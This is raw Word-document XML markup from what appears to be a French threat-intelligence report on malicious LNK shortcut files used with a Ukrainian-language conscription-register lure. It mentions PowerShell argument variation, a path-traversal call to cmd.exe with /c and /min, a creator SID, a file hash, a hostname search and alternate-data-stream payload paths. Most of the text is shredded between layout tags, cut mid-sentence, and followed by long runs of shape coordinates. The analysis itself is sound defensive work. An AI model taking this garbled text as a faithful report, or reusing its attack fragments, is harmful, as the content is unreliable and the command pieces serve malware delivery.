            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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variabilité dans la représentation des paramètres Powershell. Cette variabilité est rendue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5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2054883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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possible par la syntaxe élastique de Powershell, qui autorise l'utilisation des premiers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6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2228238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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caractères d'un paramètre tant qu'ils ne sont pas ambigus. En se basant sur les échantillons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7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2401593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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observés, le nombre de combinaisons possibles est estimé à 93 178 008, sans tenir compte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8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2574948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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des variations de casse, cette dernière n'étant pas significative pour Powershell.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9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2748303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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caractéristique réduit fortement la pertinence d'une détection reposant uniquement sur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0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2921658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1844672" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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467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forme exacte des arguments.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1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3196613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4614644" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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146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échantillons observés permettent de modéliser la commande utilisée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2912" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>973454</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3990360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5683696" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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369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26 – Illustration des variances dans les arguments de la commande Powershell au sein des échantillons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3936" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3597274</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4131965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="404388" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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438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étudiés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4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4369458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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Afin d'identifier d'éventuels variants futurs générés sur d'autres systèmes (Machine ID,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5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4541108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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5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DriveSerialNumber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, adresse MAC ou dates différentes), les outils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lnkparse</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et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lifer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7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4719343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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ont été utilisés pour comparer les onze échantillons collectés. Cette comparaison montre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8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4892698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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les seules différences significatives concernent les arguments de la ligne de commande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9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5066053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1886023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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6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dates d'accès aux fichiers.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0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5356448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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</w:rPr>
                          <w:t xml:space="preserve">Une recherche sur la chaîne</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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..\..\..\..\..\..\Windows\System32\cmd.exe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1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5571713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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8575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associée au dossier de dépôt de la charge utile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ProgramData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et à l'argument </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="1"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">/c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2128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5786978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4988608" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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860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 /min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n'a pas permis d'identifier d'autres occurrences liées à cet acteur.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3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6103843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5773368" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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33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Les fichiers LNK analysés embarquent le SID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S-1-5-21-1643202093-891272548-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4176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6319108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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75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600119237-1001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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, qui correspond à l'identifiant de sécurité Windows de l'utilisateur ayant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6515758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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créé le raccourci. Une recherche sur ce SID a permis d'identifier un échantillon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6224" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6139814</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6689113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="596783" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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7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6689113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1029383" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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93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supplémentaire,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8272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4346905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6689113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="680552" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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055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condensat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9296" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3042805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6689113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="191227" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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22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0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6859535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d1d26b0f</w:t>
                        </w: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68e26ac591848796aeef7b9c766442bbff47af8823f9b23d1b588836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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="17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23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nommé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1344" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>919480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7060788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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711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lnk.txt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 et soumis le 3 février 2026. Cet échantillon ne peut pas être interprété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2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7255733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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correctement par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lnkparse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, tandis que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</w:rPr>
                          <w:t xml:space="preserve">lifer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indique qu'il ne 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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">s'agit pas d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'un fichier LNK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3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7452583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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valide. Son analyse révèle la présence répétée de la séquence </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="-2"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">EF BF BD</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, correspondant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4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7667575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162619"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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au caractère Unicode de remplacement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U+FFFD</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="19"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle89"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">�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). Cette observation suggère que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5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7864498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5422249" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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224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 est corrompu ou a subi une altération lors de son traitement ou de son stockage.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6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8136520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796555" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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55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Une recherche sur le nom d'hôte </w:t>
                        </w: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desktop-hagd25b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(</w:t>
                        </w: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entity:file content:"desktop-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8324873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5009855" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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985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  <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">hagd25b"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 renvoie l'ensemble des douze échantillons précédemment identifiés.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8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8612528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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Les archives associées aux échantillons les plus récents contiennent un document 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9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8782950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5788640" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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8864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nommé </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="34"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Відомості з реєстру військовозобов'язаних про працівників 20260625-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0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8962655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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3994491-1.pdf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. La recherche de fragments de cette chaîne permet également d'identifier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1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9145293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">les flux de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données alternatifs (ADS) associés aux archi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ves, ceux-ci reprenant le même nom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2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9337263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3554066" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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5406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fichier (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fichier.pdf:..\..\..\&lt;...&gt;\payload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36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5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465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5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568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5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670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5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772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5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50284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1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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5367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536700">
                          <a:moveTo>
                            <a:pt x="0" y="1262379"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1536700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1536700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1262379"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1005204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1005204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1005204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="592454"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="592454"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1005839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1005839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="592454"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="334010"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="334010"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="593089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="593089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="334010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34010"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3340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0592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2641609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="349884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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498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49884">
                          <a:moveTo>
                            <a:pt x="3670299" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="349884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49884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="349884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49884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="349884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498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397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2992129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="6704965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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67049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6704965">
                          <a:moveTo>
                            <a:pt x="3670299" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
